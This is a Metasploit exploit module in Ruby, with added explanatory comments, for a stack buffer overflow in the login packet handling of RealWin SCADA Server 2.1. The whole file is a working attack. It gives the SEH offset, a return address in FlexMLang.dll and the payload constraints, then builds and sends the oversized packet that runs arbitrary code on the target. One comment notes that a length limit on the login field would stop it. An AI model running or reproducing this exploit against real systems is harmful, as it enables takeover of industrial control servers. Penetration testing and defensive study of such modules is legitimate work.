##
# $Id: realwin_on_fcs_login.rb 13007 2011-06-22 22:36:55Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
##
require
'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  # Metasploit module for the RealWin SCADA Server On_FC_CONNECT_FCS_LOGIN
  # stack buffer overflow described in 'Description' below. Control is taken
  # through an SEH overwrite (Msf::Exploit::Remote::Seh supplies
  # generate_seh_payload); the TCP transport comes from
  # Msf::Exploit::Remote::Tcp (connect / sock / disconnect).
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata with the framework and declares the one
  # option the module uses: RPORT, defaulting to 910.
  #
  # @param info [Hash] metadata passed in by the framework; merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealWin SCADA Server DATAC Login Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in DATAC Control
        International RealWin SCADA Server 2.1 (Build 6.0.10.10) or
        earlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN
        packet containing a long username, an attacker may be able to
        execute arbitrary code.
      },
      'Author'         =>
        [
          'Luigi Auriemma', #discovery
          'MC',
          'B|H '
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 13007 $',
      'References'     =>
        [
          [ 'URL', 'http://aluigi.altervista.org/adv/realwin_2-adv.txt' ],
          [ 'URL', 'http://www.dataconline.com/software/realwin.php' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          # Space/BadChars/StackAdjustment constrain the encoder; the bad
          # characters (NUL, space, LF, CR) are excluded from the encoded payload.
          'Space'           => 450,
          'BadChars'        => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Universal',
            {
              'Offset' => 392,        # Offset to SEH
              'Ret'    => 0x40012540, # pop/pop/ret @FlexMLang.dll
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 21 2011'))

    register_options([Opt::RPORT(910)], self.class)
  end

  # Assembles a single login packet and sends it to the target.
  #
  # Packet layout, exactly as appended below: three 32-bit little-endian
  # header words, a two-byte field, target['Offset'] bytes of upper-case
  # alpha filler, the SEH payload built around target.ret, further filler
  # sized so that filler + payload.encoded is 17706 bytes, then three
  # trailing 32-bit little-endian words. The fixed words are reproduced
  # from the original module; their protocol meaning is not documented here.
  #
  # Detection/mitigation note: the login field carried by this packet is on
  # the order of 392 + 17706 bytes of filler and payload, which by length
  # alone is far outside anything a legitimate username would occupy; a
  # length bound on that field, at the service or on the wire, is the
  # natural control.
  def exploit
    # 'V' packs a 32-bit unsigned integer, little-endian.
    data =  [0x67542310].pack('V')
    data << [0x00000824].pack('V')
    data << [0x00110011].pack('V')
    data << "\x01\x00"
    # Filler up to the SEH record (392 bytes for the Universal target).
    data << rand_text_alpha_upper(target['Offset'])
    # From Msf::Exploit::Remote::Seh; presumably emits the SEH record
    # pointing at target.ret followed by payload.encoded -- confirm against
    # the mixin if the exact byte count matters.
    data << generate_seh_payload(target.ret)
    # Sized from payload.encoded.length only, not from the length of the
    # string generate_seh_payload returned above.
    data << rand_text_alpha_upper(17706 - payload.encoded.length)
    data << [0x451c3500].pack('V')
    data << [0x00000154].pack('V')
    data << [0x00020040].pack('V')

    connect
    print_status("Trying target #{target.name}...")
    sock.put(data)
    # Kernel#select with no IO sets and a timeout: sleeps 0.5 s before
    # handing off to the framework handler.
    select(nil, nil, nil, 0.5)
    handler
    disconnect
  end
end